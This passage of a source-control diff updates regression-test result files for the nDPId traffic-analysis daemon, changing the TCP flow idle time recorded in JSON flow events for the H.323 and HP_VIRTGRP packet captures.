00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":532,"packets-processed":532,"total-skipped-flows":0,"total-l4-data-len":97842,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":6,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1592553079303} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 532/532 diff --git a/test/results/h323-overflow.pcap.out b/test/results/h323-overflow.pcap.out index 4deafcdd2..ec3db199f 100644 --- a/test/results/h323-overflow.pcap.out +++ b/test/results/h323-overflow.pcap.out @@ -1,9 +1,9 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"h323-overflow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":4,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/h323.pcap.out b/test/results/h323.pcap.out index 3d9929876..384d73352 100644 --- a/test/results/h323.pcap.out +++ b/test/results/h323.pcap.out @@ -5,12 +5,12 @@ 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1198747080010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":125,"pkt_l4_len":91,"thread_ts_msec":1198747080010,"pkt":"ABMh8GpfABj+bZZlCABFAABviRAAAIARjk0RAgChEQIAfAa3B\/IAWwaKBIAAAAYACJFKAAQ+AE8AcABlAG4ASAAzADIAMwAgAEcAYQB0AGUAawBlAGUAcABlAHIAIABvAG4AIABtAGYAbwB0AHQAZQBrAGkAbgARAgChBrc="} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1198747080226,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1198747080226,"pkt":"ABj+bZZlABMh8GpfCABFAACgx94AAIART04RAgB8EQIAoQfyBrcAjI1fDsAAAQYACJFKAASAAQARAgB8BrgBABECAHwH8iIArgEAPQABhA4QA0AzMzMzMzMzMzCZkD4ATwBwAGUAbgBIADMAMgAzACAARwBhAHQAZQBrAGUAZQBwAGUAcgAgAG8AbgAgAG0AZgBvAHQAdABlAGsAaQBuAK4BAD0oCwAAAQABgAGA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":1297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1198747160184} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 diff --git a/test/results/hpvirtgrp.pcap.out b/test/results/hpvirtgrp.pcap.out index 0fb7d0723..56b25d2a0 100644 --- a/test/results/hpvirtgrp.pcap.out +++ b/test/results/hpvirtgrp.pcap.out @@ -1,66 +1,66 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hpvirtgrp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614852331255} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":522,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1614861892925} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 